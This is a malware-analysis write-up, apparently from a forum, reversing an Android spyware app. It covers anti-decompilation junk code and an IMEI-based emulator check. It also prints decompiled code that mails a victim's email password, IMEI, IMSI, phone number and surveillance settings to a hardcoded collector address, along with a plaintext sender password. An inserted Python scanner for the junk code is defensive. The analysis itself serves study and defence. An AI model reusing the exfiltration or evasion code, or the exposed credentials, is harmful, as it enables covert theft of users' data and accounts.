Note: anti-virus software will flag this APP, but it is itself essentially a Trojan; if that bothers you, think twice before downloading it.
Tools used: APKIDE (改之理)
IDA Pro
ARM assembly converter
UltraEdit
First I ran the software: the splash screen came up and then it simply exited. I was using the Android SDK 2.2 emulator; was it a version problem? I switched to 4.x and the behaviour was exactly the same, so my first thought was that the APP detects the emulator environment.
So let's decompile it and take a look. I decompiled the apk with APKIDE, which went smoothly, analysed AndroidManifest.xml and found the main Activity to be com.vipios.activity.MainActivity, located MainActivity.smali in the corresponding directory and opened it: very long and not at all readable. Let's look at the Java code instead, but the menu item for opening the Java source was greyed out and could not be selected. The decompiled class names and smali content looked neat and unobfuscated, so I was not willing to give up.
What is going on? Is there something fishy in the dex? Time for IDA Pro. Drag the apk into IDA and select classes.dex for analysis. Since we are here to find problems, press Ctrl-Q once the analysis finishes to view the problem list. See that? Quite a few!
Clicking the first CODE entry, the code shown makes no sense, and the Source file was not parsed either:
This code belongs to public java.lang.String android.a.a(), which corresponds to the file smali\android\a.smali. Opening it in APKIDE shows source "\nSDK\u7248\u672c:"; this is clearly junk code planted to disrupt decompilers, so I simply deleted a.smali.
The remaining problem code was handled the same way. After deleting the junk smali files the project compiled in APKIDE; I then decompiled the apk I had just built, and this time the Java source menu item was enabled. Opening it showed very clean code. Bingo! (Note: this rebuilt apk cannot run; all later modifications are based on the original package.)
Moving on to MainActivity, the isMoni() function called from onStart (moni being the pinyin of 模拟, "emulate") looks suspicious both by name and by shape. Let's look at the code:
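The anti-decompilation trick above, a .source directive stuffed with escape sequences, was removed by hand one file at a time. As an added example that is not part of the original post, here is a small Python scanner that flags smali files whose .source value contains control-character or \u escapes, so they can be reviewed before deletion; it assumes a decompiled apk directory (APKIDE or apktool output) as input, and the sample smali texts are constructed.

```python
import re
from pathlib import Path

# A smali ".source" directive, capturing the quoted value.
SOURCE_RE = re.compile(r'^\s*\.source\s+"(.*)"\s*$', re.MULTILINE)
# Escapes that do not belong in a real source file name: control
# characters and \uXXXX sequences (baksmali writes non-ASCII as \u escapes,
# so a \u hit is a candidate for review, a control character is bogus).
SUSPICIOUS_ESCAPE_RE = re.compile(r'\\(?:[ntrbf0]|u[0-9a-fA-F]{4})')


def suspicious_source(smali_text):
    """Return the .source value if it carries suspicious escapes, else None."""
    m = SOURCE_RE.search(smali_text)
    if m is None:
        return None
    value = m.group(1)
    return value if SUSPICIOUS_ESCAPE_RE.search(value) else None


def find_bad_sources(files):
    """files: {path: smali text}. Returns {path: bad .source value}."""
    findings = {}
    for path, text in sorted(files.items()):
        value = suspicious_source(text)
        if value is not None:
            findings[path] = value
    return findings


def scan_smali_tree(root):
    """Walk a decompiled apk directory (e.g. APKIDE/apktool output)."""
    root = Path(root)
    files = {str(p.relative_to(root)): p.read_text(encoding="utf-8", errors="replace")
             for p in root.rglob("*.smali")}
    return find_bad_sources(files)


# Constructed samples, modelled on the a.smali described in the write-up.
SAMPLE_BAD = '''.class public Landroid/a;
.super Ljava/lang/Object;
.source "\\nSDK\\u7248\\u672c:"
'''
SAMPLE_OK = '''.class public Lcom/vipios/activity/MainActivity;
.super Landroid/app/Activity;
.source "MainActivity.java"
'''

if __name__ == "__main__":
    for path, value in find_bad_sources(
            {"smali/android/a.smali": SAMPLE_BAD,
             "smali/com/vipios/activity/MainActivity.smali": SAMPLE_OK}).items():
        print(f"{path}: suspicious .source {value!r}")
```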
```java
// Emulator check: treats a missing, empty or all-zero IMEI as an emulator.
private boolean isMoni()
{
    String str = ((TelephonyManager)getSystemService("phone")).getDeviceId();
    return (str != null) && (str.trim().length() != 0) && (!str.matches("0+"));
}
```
```java
// Network check: bails out with a toast unless mobile data or Wi-Fi is up.
if (!OtherOperatorService.check3Gwifi(getApplicationContext()))
{
    Toast.makeText(getApplicationContext(), "先开启手机网络,以便测试邮箱是否可用", 1).show();
    return;
}
```
The same check in smali:
```smali
invoke-static {v3}, Lcom/vipios/service/OtherOperatorService;->check3Gwifi(Landroid/content/Context;)Z
move-result v3
if-nez v3, :cond_3
```
```java
// Sends a test mail through the SMTP account the user entered, using the
// victim's own address as both sender and recipient.
Thread localThread = new Thread(new Runnable()
{
    public void run()
    {
        String str1 = MainActivity.this.smtpTemp;
        String str2 = MainActivity.this.portTemp;
        String str3 = MainActivity.this.userEmailTemp;
        String str4 = MainActivity.this.userPasswordTemp;
        String str5 = MainActivity.this.userEmailTemp;
        String[] arrayOfString = new String[1];
        arrayOfString[0] = MainActivity.this.userEmailTemp;
        MailSenderInfo localMailSenderInfo = new MailSenderInfo(str1, str2, str3, str4, true, str5, arrayOfString, MainActivity.this.subject, MainActivity.this.content);
        if (new SimpleMailSender().sendHtmlMail(localMailSenderInfo))
        {
            MainActivity.testok = 1;
            MainActivity.this.userSave();
            return;
        }
        MainActivity.testok = 2;
    }
});
localThread.start();
try
{
    localThread.join();
    if (testok == 1)
    {
        Toast.makeText(getApplicationContext(), "恭喜你,保存成功", 1).show();
        setUserEditedStates(false);
        // Report subject: victim mailbox, IMEI, app version and package name.
        this.subject = (this.userEmailTemp + "-" + this.shoujiImei + "正在测试" + OtherOperatorService.getVersionName(this) + "版(" + getPackageName() + "-" + "" + "-" + "finspy_vip@163.com" + ")");
        // Report body: the configured mailbox and password, the bound phone number,
        // the enabled capture features (call log, SMS log, call recording, location
        // log, QQ log, WeChat log), the send settings (any network / Wi-Fi only),
        // SDK/model/Android version, the current SIM number and IMSI, and a Baidu map link.
        this.content = ("设定邮箱:" + this.userEmailTemp + "(" + this.userPasswordTemp + ")绑定号码:" + this.userPhoneNumberTemp + ";设置功能:" + this.tonghuajiluTemp + "," + this.duanxinjiluTemp + "," + this.tonghualuyinTemp + "," + this.weizhijiluTemp + "," + this.qqjiluTemp + "," + this.weixinjiluTemp + ";发送设置:" + this.allnetTemp + "," + this.wifiTemp + ";SDK版本:" + Build.VERSION.SDK_INT + ";" + "Model型号:" + Build.MODEL + ";Android版本:" + Build.VERSION.RELEASE + "<br/>当前卡号及编码" + this.NativePhoneNumber + "," + this.IMSI + "(" + OtherOperatorService.getCardName(this.IMSI) + ")" + LocationEmailInfo.getBaiduMaplink());
        // The report is then mailed from a hardcoded account to a hardcoded collector
        // address, so the victim's credentials and settings leave the device.
        OtherOperatorService.uploadEmail(OtherOperatorService.getUserSmtp("tyling7775@yeah.net"), OtherOperatorService.getUserPort("tyling7775@yeah.net"), "tyling7775@yeah.net", "tyling132014", "tyling7775@yeah.net", new String[] { "finspy_vip@163.com" }, this.subject, this.content);
        testok = 0;
        return;
    }
}
catch (InterruptedException localInterruptedException)
{
    // The loop below is a decompiler artifact; the effective behaviour is the
    // failure toast that follows.
    do
    {
        for (;;)
        {
            testok = 2;
        }
    } while (testok != 2);
    Toast.makeText(getApplicationContext(), "开启你邮箱SMTP服务(查看帮助),或邮箱或密码输入错误;或更换邮箱重试!", 1).show();
    testok = 0;
}
```